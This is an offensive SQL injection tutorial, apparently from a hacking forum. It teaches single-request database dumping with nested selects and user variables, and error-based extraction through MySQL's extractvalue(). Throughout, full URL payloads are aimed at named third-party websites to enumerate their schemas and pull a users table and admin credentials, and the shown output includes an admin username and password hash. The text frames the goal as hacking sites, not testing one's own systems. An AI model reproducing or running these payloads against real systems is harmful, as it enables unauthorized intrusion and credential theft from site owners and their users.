Enumeration in minimal requests [DUMP DB in 1 request] What we will be doing is using nested select statements, (subquerys), along with

our own variable to bypass the 1024 character limit of group_concat. If you're new to sql, this might look a bit advanced. Just study the code, though. Using this, you can get all the info you need in 2 requests. First of, the database/table/columns. Code: (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x) PoC: Code: http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+ Of course, if magic_quotes is enabled you would need to bypass using quotations by using hex values, or using the char() function. View the source, and we see every single database/table/column accessible:

Now, to grab information from the columns. Code: (select (@) from (select (@x:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x) POC Code: http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+

xPath Injection If you're trying to hack a site, and you try looking for tons of methods, and you finally find an SQLi vuln yet Order by, 1=1 etc doesn't work then cances are you could use xPath injection. This is for MySQL v5.1 only.

We will be using extractvalue() to get the data we need.

First of all, we need a vulnerable site. Code: http://www.ianforsythphotographer.com/main.php?id=1' This is vulnerable to union based injection, yes, but for the purposes of this tutorial I will use xPath injection.

First of all to gather data we will be using extractvalue(rand(),concat(0x0a,data)) So, Code: http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,version()))--+ "Query failed: XPATH syntax error: ' 5.1.39-log'"

Now to get the table names, we will use Code: and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--+ Use limit to increment the tables. So Code: http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=0x69665f696d61676573 limit 3,1)))--+ "Query failed: XPATH syntax error: '::plogger_config'"

Now to get the columns of that table, we will use the same basically, except replace tables with columns. And again use order by to increment in columns. Code: and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="TABLE NAME" limit 0,1)))

So, Code: http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 3,1)))--+ "Query failed: XPATH syntax error: '::admin_username'" and.. Code: http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 4,1)))--+ "Query failed: XPATH syntax error: '::admin_password'"

Now that we have the columns, we will need to get the data from them. We will use..

Code: extractvalue(rand(),concat(0x0a,(select concat(COLUMNS) from TABLE)))-So, Code: http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(admin_username,0x3a,admin_password) from if_images.plogger_config LIMIT 0,1)))--+ "Query failed: XPATH syntax error: 'admin:392592ed88f501ea498f14343'"